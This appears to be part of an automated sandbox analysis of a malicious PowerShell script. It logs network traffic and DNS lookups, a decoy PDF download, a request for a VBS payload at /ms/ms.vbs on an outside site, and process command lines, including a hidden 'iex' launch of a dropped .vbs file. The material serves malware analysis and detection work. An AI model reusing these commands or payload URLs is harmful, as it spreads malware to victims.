Dec 19, 2024 12:50:44.088418961 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.088474989 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:44.088485003 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.088526964 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:44.096921921 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.096959114 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.097009897 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:44.097023010 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.097091913 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:44.105233908 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.105269909 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.105380058 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:44.105391026 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.105424881 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:44.113852024 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.113892078 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.113934994 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:44.113944054 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.113993883 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:44.121530056 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.121567965 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.121611118 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:44.121623039 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.121669054 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:44.252456903 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.252500057 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.252537966 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:44.252568007 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.252584934 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:44.252605915 CET  49704        443        192.168.2.8      107.161.23.150
Dec 19, 2024 12:50:44.259638071 CET  443          49704      107.161.23.150   192.168.2.8
Dec 19, 2024 12:50:44.259702921 CET  443          49704      107.161.23.150   192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.259723902 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.259738922 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.259799004 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.259799004 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.267108917 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.267146111 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.267195940 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.267206907 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.267246008 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.273246050 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.273279905 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.273324966 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.273343086 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.273356915 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.273374081 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.280390024 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.280426979 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.280477047 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.280494928 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.280515909 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.280531883 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.287425995 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.287461996 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.287550926 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.287568092 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.287575960 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.287619114 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.294653893 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.294689894 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.294725895 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.294743061 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.294780016 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.301752090 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.301789045 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.301830053 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.301836967 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.301868916 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.444873095 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.444910049 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.444943905 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.445014954 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.445024014 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.445060015 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.451666117 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.451695919 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.451772928 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.451786995 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.451817989 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.458952904 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.458987951 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.459043026 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.459053040 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.459101915 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.465380907 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.465401888 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.465473890 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.465485096 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.465538025 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.472678900 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.472712994 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.472762108 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.472770929 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.472816944 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.482326984 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.482358932 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.482404947 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.482414961 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.482538939 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.486509085 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.486535072 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.486618996 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.486649036 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.486695051 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.493952990 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.493993998 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.494033098 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.494060993 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.494088888 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.494107008 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.636547089 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.636590958 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.636692047 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.636692047 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.636723042 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.636765003 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.643642902 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.643682957 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.643757105 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.643769026 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.643801928 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.650919914 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.650950909 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.651088953 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.651103020 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.651140928 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.657356977 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.657392979 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.657507896 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.657520056 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.657563925 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.664652109 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.664688110 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.664804935 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.664814949 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.664853096 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.671389103 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.671412945 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.671514988 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.671525955 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.671556950 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.678828955 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.678885937 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.678963900 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.678973913 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.678996086 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.679014921 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.685915947 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.685959101 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.686033964 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.686043978 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.686091900 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.829472065 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.829544067 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.829804897 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.829804897 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.829832077 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.829866886 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.835937023 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.835993052 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.836019039 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.836029053 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.836070061 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.837073088 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.837131977 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.837137938 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.837172985 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.837218046 CET44349704107.161.23.150192.168.2.8
                                                                                              Dec 19, 2024 12:50:44.837260962 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:44.839842081 CET49704443192.168.2.8107.161.23.150
                                                                                              Dec 19, 2024 12:50:45.222167969 CET4970780192.168.2.8203.175.174.69
                                                                                              Dec 19, 2024 12:50:45.341846943 CET8049707203.175.174.69192.168.2.8
                                                                                              Dec 19, 2024 12:50:45.342021942 CET4970780192.168.2.8203.175.174.69
                                                                                              Dec 19, 2024 12:50:45.342175961 CET4970780192.168.2.8203.175.174.69
                                                                                              Dec 19, 2024 12:50:45.461586952 CET8049707203.175.174.69192.168.2.8
                                                                                              Dec 19, 2024 12:50:46.874804020 CET8049707203.175.174.69192.168.2.8
                                                                                              Dec 19, 2024 12:50:46.914393902 CET4970780192.168.2.8203.175.174.69
                                                                                              Dec 19, 2024 12:50:48.410336018 CET4970780192.168.2.8203.175.174.69
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 12:50:41.236665010 CET | 55687 | 53 | 192.168.2.8 | 1.1.1.1
Dec 19, 2024 12:50:41.374449015 CET | 53 | 55687 | 1.1.1.1 | 192.168.2.8
Dec 19, 2024 12:50:44.995392084 CET | 57510 | 53 | 192.168.2.8 | 1.1.1.1
Dec 19, 2024 12:50:45.220695972 CET | 53 | 57510 | 1.1.1.1 | 192.168.2.8
Dec 19, 2024 12:50:55.645312071 CET | 62240 | 53 | 192.168.2.8 | 1.1.1.1
Dec 19, 2024 12:51:12.447738886 CET | 61764 | 53 | 192.168.2.8 | 1.1.1.1
Dec 19, 2024 12:51:24.891891956 CET | 60281 | 53 | 192.168.2.8 | 1.1.1.1
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 19, 2024 12:50:41.236665010 CET | 192.168.2.8 | 1.1.1.1 | 0x27e8 | Standard query (0) | www.astenterprises.com.pk | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:50:44.995392084 CET | 192.168.2.8 | 1.1.1.1 | 0xe8c5 | Standard query (0) | www.bluemaxxlaser.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:50:55.645312071 CET | 192.168.2.8 | 1.1.1.1 | 0x5c20 | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:51:12.447738886 CET | 192.168.2.8 | 1.1.1.1 | 0xc8d3 | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:51:24.891891956 CET | 192.168.2.8 | 1.1.1.1 | 0x54c | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 19, 2024 12:50:41.374449015 CET | 1.1.1.1 | 192.168.2.8 | 0x27e8 | No error (0) | www.astenterprises.com.pk | astenterprises.com.pk | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 12:50:41.374449015 CET | 1.1.1.1 | 192.168.2.8 | 0x27e8 | No error (0) | astenterprises.com.pk | - | 107.161.23.150 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:50:44.436049938 CET | 1.1.1.1 | 192.168.2.8 | 0x98c2 | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 12:50:44.436049938 CET | 1.1.1.1 | 192.168.2.8 | 0x98c2 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | - | 217.20.58.100 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:50:44.436049938 CET | 1.1.1.1 | 192.168.2.8 | 0x98c2 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | - | 217.20.58.98 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:50:44.436049938 CET | 1.1.1.1 | 192.168.2.8 | 0x98c2 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | - | 217.20.58.99 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:50:45.220695972 CET | 1.1.1.1 | 192.168.2.8 | 0xe8c5 | No error (0) | www.bluemaxxlaser.com | - | 203.175.174.69 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:50:55.893668890 CET | 1.1.1.1 | 192.168.2.8 | 0x5c20 | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 12:51:12.591471910 CET | 1.1.1.1 | 192.168.2.8 | 0xc8d3 | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 12:51:25.029556990 CET | 1.1.1.1 | 192.168.2.8 | 0x54c | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 12:51:50.468987942 CET | 1.1.1.1 | 192.168.2.8 | 0x625a | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 12:51:50.468987942 CET | 1.1.1.1 | 192.168.2.8 | 0x625a | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                                                                              • www.astenterprises.com.pk
                                                                                              • www.bluemaxxlaser.com
Session ID: 0 | Source IP: 192.168.2.8 | Source Port: 49707 | Destination IP: 203.175.174.69 | Destination Port: 80 | PID: 3284 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 12:50:45.342175961 CET | 80 | OUT | GET /ms/ms.vbs HTTP/1.1
                                                                                              Host: www.bluemaxxlaser.com
                                                                                              Connection: Keep-Alive
Dec 19, 2024 12:50:46.874804020 CET | 516 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Thu, 19 Dec 2024 11:50:46 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 315
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 0 | Source IP: 192.168.2.8 | Source Port: 49704 | Destination IP: 107.161.23.150 | Destination Port: 443 | PID: 3284 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 11:50:42 UTC | 127 | OUT | GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
                                                                                              Host: www.astenterprises.com.pk
                                                                                              Connection: Keep-Alive
2024-12-19 11:50:43 UTC | 217 | IN | HTTP/1.1 200 OK
                                                                                              Connection: close
                                                                                              content-type: application/pdf
                                                                                              last-modified: Sun, 28 Jan 2024 19:03:01 GMT
                                                                                              accept-ranges: bytes
                                                                                              content-length: 871324
                                                                                              date: Thu, 19 Dec 2024 11:50:42 GMT
                                                                                              server: LiteSpeed
2024-12-19 11:50:43 UTC | 16384 | IN | Data Ascii: %PDF-1.7%129 0 obj<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>endobj 143 0 obj<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B345


                                                                                              Target ID:0
                                                                                              Start time:06:50:27
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H6epOhxoPY.ps1"
                                                                                              Imagebase:0x7ff6cb6b0000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:1
                                                                                              Start time:06:50:27
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff6ee680000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:3
                                                                                              Start time:06:50:30
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\lvykjh.vbs'"
                                                                                              Imagebase:0x7ff6cb6b0000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:6
                                                                                              Start time:06:50:43
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
                                                                                              Imagebase:0x7ff6e8200000
                                                                                              File size:5'641'176 bytes
                                                                                              MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:7
                                                                                              Start time:06:50:45
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                              Imagebase:0x7ff79c940000
                                                                                              File size:3'581'912 bytes
                                                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:8
                                                                                              Start time:06:50:45
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                              Imagebase:0x7ff67e6d0000
                                                                                              File size:55'320 bytes
                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:9
                                                                                              Start time:06:50:45
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1624,i,4563847873640221510,10581209882745739049,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                              Imagebase:0x7ff79c940000
                                                                                              File size:3'581'912 bytes
                                                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                                Strings